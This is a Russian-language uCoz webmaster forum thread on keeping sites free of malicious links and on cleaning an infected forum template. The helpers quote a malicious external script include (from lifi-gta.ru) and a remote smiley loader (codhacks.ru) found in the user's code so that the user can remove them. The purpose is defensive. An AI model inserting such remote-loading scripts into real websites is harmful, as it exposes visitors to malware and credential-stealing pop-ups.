Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 736 | 22:12:51
    Цитата lightwarrior ()
    блокировка вылезает только на этой странице? походите по темам форума. на других страницах или темах вылезает блокировка или только в этой теме исключительно?
    Во всех темах форума так, при попытке зайти сбрасывается соединение антивирусом и всплывает окошко о блокировке... eek
    С главной страницей, каталогом файлов, фотоальбомом всё хорошо, такая беда похоже что только на форуме с темами.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 737 | 22:30:28
    lightwarrior, самое интересное что на сайте у вас прописан вредоносный код. он раньше детектировался практически всеми антивирусами и до сих пор есть в базах, хотя сам адрес скончался

    Код
    <script language="javascript" src="http://lifi-gta.ru/jogin_form_javascript.js"></script>


    у вас очень грязный сайт в смысле сторонних скриптов, коих понатыкано надо или не надо и обязательно с подгрузкой с чужих сайтов самих скриптов и картинок

    ваша задача найти скрипт, который не смог обработать аваст. такой сигнатурой он метить все что не может обработать

    вот например этот очень нужный скрипт не закрыт
    Код

    <script type="text/javascript">  
    function spoiler_js(obj) {  
    var obj_content = obj.parentNode.parentNode.getElementsByTagName('div')[1];  
    var obj_text_show = obj.getElementsByTagName('span')[1];  
    var obj_text_hide = obj.getElementsByTagName('span')[0];  

    if (obj_content.style.display != '') {  
    obj_content.style.display = '';  
    obj_text_show.style.display = '';  
    obj_text_hide.style.display = 'none';  
    } else {  
    obj_content.style.display = 'none';  
    obj_text_show.style.display = 'none';  
    obj_text_hide.style.display = '';  
    }  
    return false;  
    }  
    </script


    но сначала надо провести эксперимент. сделайте бекап шаблонов ОБЯЗАТЕЛЬНО! - далее восстановите шаблоны форума. общий шаблон и шаблон вида материалов. после полного восстановления шаблонов форума пробегитесь опять своим авастом по темам
    и ещё вопрос. когда вы обновляли свой аваст последний раз?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 738 | 23:02:16
    Цитата webanet ()
    но сначала надо провести эксперимент. сделайте бекап шаблонов ОБЯЗАТЕЛЬНО! - далее восстановите шаблоны форума. общий шаблон и шаблон вида материалов. после полного восстановления шаблонов форума пробегитесь опять своим авастом по темами ещё вопрос. когда вы обновляли свой аваст последний раз?
    Хм, создал на компьютере текстовый документ и скопировал туда всё , что было в форме добавления сообщения, затем сохранил и просканил этот текстовый документ авастом, выдал трояна, того что был в блокирующем окне, похоже что код прописан именно здесь... Аваст у меня обновляется вроде как автоматически. Восстановить стандартный шаблон пока что не пробовал.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 739 | 23:03:41
    lightwarrior, попробуйте. это важно. сделайте бекап шаблонов и воссатновите. после восстановления прогуляйтесь авастом снова по темам форума

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 740 | 23:21:13
    Цитата webanet ()
    попробуйте. это важно. сделайте бекап шаблонов и воссатновите. после восстановления прогуляйтесь авастом снова по темам форума
    В общем восстановил стандартный шаблон формы добавления сообщения и проблема ушла сама собой, но как бы вернуть прежнюю форму, чтобы она работала как раньше, найти бы этот вредоносный код, который блочит...
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 741 | 23:23:49
    lightwarrior, ну давайте сюда код формы добавления бум разбираться

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 742 | 23:43:54
    Цитата webanet ()
    ну давайте сюда код формы добавления бум разбираться
    Прикрепил текстовый к сообщению.
    Заметил есть скрипт, на который ругается аваст, но кроме него есть видимо и другие, так как удаление не помогло. В ответ его писать не буду, то есть в форму сообщения, так как возможно аваст заблочит и вашу страницу, всё в текстовом...

    Добавлено (14 Ноя 2013, 23:43:54)
    ---------------------------------------------
    Что то текстовый не вышло добавить, получается придётся кидать весь код сюда под спойлер?

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 743 | 23:44:46
    lightwarrior, вы залейте текстовый к себе на сайт, а тут дайте ссылку. нет в прикреплениях вашего текстового

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 744 | 23:50:41
    Цитата webanet ()
    вы залейте текстовый к себе на сайт, а тут дайте ссылку. нет в прикреплениях вашего текстового
    Вот он
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 745 | 00:01:36
    lightwarrior, пока давайте сделаем это

    удалить

    Код
    <script type="text/javascript" src="http://criminall.ucoz.com/alltranslit.js"></script>

    Цитата

    <h3 style="cursor:hand" onClick="expandit(this)"><img src="http://oz.ucoz.net/smiles/108.gif"> Показать Дополнительные Смайлики</h3>
    <span style="display:none" style=&{head};>
    <center><script>
    MaxSmile=124;
    ucozservice='http://codhacks.ru/smi/';
    for(i=1; i<=MaxSmile; i++) {
    bb='[img]'+ucozservice+i+'.gif[/img]';
    document.write('<a href="javascript://" onClick="emoticon(');
    document.write("'"+bb+"'");
    document.write(');return false;"><img border="0" src="'+ucozservice+i+'.gif"></a> ');}
    </script></span></center></td></tr>


    красное перелить на сайт. зеленое удалить из кода и проверить снова. если продолжит гавкать, то вот эту часть снять полностью
    Код

    <script language="JavaScript">  

    var text_enter_audio = "http://any_site.com/music.mp3 ";  
    var text_enter_video = "http://any_site.com/music.mp3 ";  

    function tag_audio()  
    {  
    var FoundErrors = '';  
    var enterAudio = prompt(text_enter_audio, "http://any_site.com/music.mp3");  
    if (!enterAudio || enterAudio=='http://any_site.com/music.mp3') {  
    FoundErrors = 1;  
    }  
    if (FoundErrors) {  
    return;  
    }  
    doInsert("[audio]"+enterAudio+"[/audio]", "", false);  
    }  

    function tag_video()  
    {  
    var FoundErrors = '';  
    var enterVideo = prompt(text_enter_video, "http://youtube.com/watch?v=DbzFNj8HVmc");  
    if (!enterVideo || enterVideo=='http://youtube.com/watch?v=DbzFNj8HVmc') {  
    FoundErrors = 1;  
    }  
    if (FoundErrors) {  
    return;  
    }  
    doInsert("[video]"+enterVideo+"[/video]", "", false);  
    }  
    </script>

    вероятно он не может обработать урл в скрипте анисайт

    после каждого действия проверяем прогулками по темам и смотрим гавкает или нет

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 746 | 00:42:51
    Цитата lightwarrior ()
    пока давайте сделаем это
    Проблема решена, было достаточно удалить строку http://codhacks.ru/smi/
    Без неё перестали работать дополнительные смайлы, пришлось их убрать совсем, но это уже не беда, учитывая то, что они отображаются в старых сообщениях пользователей, я их удалил чисто из опций.
    Но тут нарисовалась новая проблемка, по началу пробежался по темам форума, из них одна не работала, тупо сбрасывалось соединение, все остальные темы при этом работали, затем я вернул код с сообщением hacks... Зашел в другую тему форума, аваст конечно же заблочил, убрал код и после этого ту тему, в которую я попытался зайти теперь постоянно сбрасывается соединение, а до этого я не мог зайти в другую тему, но теперь она работает, как бы получается обменялись проблемой темы. В принципе проблема не значительна, тему могу просо удалить и всё, в ней всё равно пока что нет новых сообщений... Ах да, у других точно также, все остальные работают. Вот на неё прямая ссылка
    А так то в общем всё работает нормально, спасибо за оперативность!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 747 | 00:46:33
    lightwarrior, если темы не открываются, то попробуйте сбросить кеш и попробовать войти снова. или другим браузером в проблемную тему

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 748 | 00:51:22
    webanet,Пробовал с других браузеров, не работает только одна тема, у других
    пользователей тоже, в остальном всё в порядке, наверное придётся её
    удалить... лишь бы не перебросилось на какую нибудь другую тему
    Сообщение отредактировал lightwarrior - Пятница, 15 Ноя 2013, 00:55:26
    SINOPTIK4895
    Сообщений: 37
    Репутация: 0

    Сообщение # 749 | 00:52:35
    Аваст поймал вирус на моем сайтеhttp://sverdlovsknews.ucoz.ua/, что делать? Этому предшествовало попадание рекламных ссылок в "гостевой", их удалил, но еще не снят запрет антивирусника, как долго это будет продолжатся, и как обезопасить себя в дальнейшем?

    Сообщение отредактировал SINOPTIK4895 - Пятница, 15 Ноя 2013, 01:14:22
    lightwarrior
    Сообщений: 44
    Репутация: 0

    Сообщение # 750 | 01:15:07
    webanet, удалил текстовый документ с кодом из файлового менеджера, который прикреплял выше и тема заработала, еще раз спасибо. thumb
    P.S. будут побочные эффекты дам знать.
    Поиск: